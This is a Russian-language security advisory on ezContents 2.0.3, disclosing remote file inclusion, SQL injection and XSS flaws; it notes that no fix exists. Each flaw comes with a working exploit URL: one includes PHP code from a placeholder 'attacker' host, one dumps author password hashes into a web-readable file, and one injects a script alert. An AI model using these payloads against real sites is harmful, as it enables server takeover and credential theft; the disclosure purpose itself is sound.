Программа: ezContents 2.0.3, возможно другие версии.
Опасность: Высокая
Наличие эксплоита: Да
Описание:
Уязвимостьпозволяет удаленному пользователю произвести XSS нападение, выполнитьпроизвольные SQL команды в базе данных приложения и выполнитьпроизвольный PHP сценарий на целевой системе.
1. Уязвимостьсуществует из-за недостаточной обработки входных данных в функции"moduleExternalLink()" в сценарии modules/moduleSec.php. Удаленныйпользователь может просмотреть произвольные файлы или выполнитьпроизвольный PHP сценарий на целевой системе с привилегиями Webсервера. Пример:
http://host/modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://attacker/file.php
http://host/modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=/tmp/file.php%00
Уязвимостьсуществует также в функции "isExternalLink()" в сценарииinclude/functions.php и в функции "adminExternalLink()" в сценарииadmin/adminbutton.php.
2. Уязвимость существует из-занедостаточной обработки входных данных в параметре "groupname" сценарияheaderuserdata.php. Удаленный пользователь может с помощью специальносформированного запроса выполнить произвольные SQL команды в базеданных приложения. Пример:
http://[host]/headeruserdata.php?groupname=' UNION SELECT userpassword FROM authors INTO OUTFILE '/www/passwd.txt' #
3.Уязвимость существует из-за недостаточной обработки входных данных впараметре "subgroupname" сценария loginreg2.php. Удаленный пользовательможет с помощью специально сформированного запроса выполнитьпроизвольный код сценария в браузере жертвы в контексте безопасностиуязвимого сайта. Пример:
http://[host]/loginreq2.php?subgroupname=">alert(666)
URL производителя: www.ezcontents.org
Решение: Способов устранения уязвимости не существует в настоящее время.